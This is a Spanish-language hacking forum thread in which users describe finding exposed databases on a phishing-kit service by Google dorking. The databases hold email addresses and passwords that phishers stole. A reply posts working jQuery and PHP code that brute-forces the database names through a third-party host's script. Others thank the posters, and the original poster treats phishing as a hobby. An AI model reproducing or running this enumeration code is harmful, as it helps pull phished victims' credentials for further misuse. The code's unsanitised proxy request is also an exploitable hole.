Nadie sabe para quien trabaja!

yack · Mayo 26, 2015, 04:56:25 PM

Comienzo mi dia tranquilo y como soy amante de lo que respecta a ing. social (fakes/scam, engaños, phishing : Ojo con fines educativos claro esta!) enpece buscando con mi buscador preferido sitios en donde se pueda configurar un ataque de phishing, y me tope con No tienes permitido ver los links. Registrarse o Entrar a mi cuenta creo yo que ya lleva mucho tiempo en el tema, pero bueno vamos a lo que respecta el tema, ps me di cuenta que solo basta con poner un nombre clave a tu base de datos (bd) y ps con ese nombre que supuestamente tu y solo tu debes saber, vizualizaras los correos y claves que hayas pescado.

decidí hacer una búsqueda con el dork site: en google

Código: php

site:http://xploitv.net/b=

y ps me resulto muy fácil leer todas las bases de datos que quise. si me preguntan si me interesan ps no me interesan por que no se de quien son ni a quien les pertenecen así que no he hecho nada malo.

y como es mi primer aporte en underc0de, ps decidí postearlo solo aquí.

Pd: si alguien lo postea en otro site por favor respete los créditos.
Saludos.

arthusu · Mayo 26, 2015, 11:08:11 PM

Se que es algo tonto pero a eso le puedes hacer fuerza bruta demasiado facil y seria mas eficiente que google:

finder_usernames.html

Código: php

<script type="text/javascript" src="jQuery/js/jquery-2.1.4.min.js"></script>
<script type="text/javascript">
	$("document").ready(function(){
		$("#submit").click(function(e){
			e.preventDefault();
			var list_users = $("#usernames").val().split("\n");
			$.each(list_users,function(index,username){
				//console.log(username+ "\n");
				$.get(
					'usernames.php',
					{usernames : username},
					function(data) {
                    	$('.resultados').append(username + ":" + data + '<br />');
                 	},
                 	"text"
				);
			});
		});
	});
</script>
<form action="" method="post">
	<textarea cols="50" rows="20" id="usernames" name="usernames"></textarea>
	<input type="submit" id="submit" value="Exploit Usernames" />
</form>
<p class="resultados"></p>

usernames.php

Código: php


<?php
	if(isset($_GET['usernames'])){
		echo file_get_contents("http://server5.lincehost.net/~neek/xploitv/script2.php?db={$_GET['usernames']}&action=count");
	}
?>

y para leerlos:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

o usar el servicio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

donde c es el numero de usuarios

Saludos!

yack · Mayo 26, 2015, 11:16:35 PM

que te puedo decir brth ARTHUSU, no solo complementaste el post. genial.
saludos.

DeanW · Junio 04, 2015, 01:59:46 AM

Muy buen aporte muchas gracias me sirvio bastante

Nadie sabe para quien trabaja!

yack

Mayo 26, 2015, 04:56:25 PM

arthusu

Mayo 26, 2015, 11:08:11 PM #1

yack

Mayo 26, 2015, 11:16:35 PM #2

DeanW

Junio 04, 2015, 01:59:46 AM #3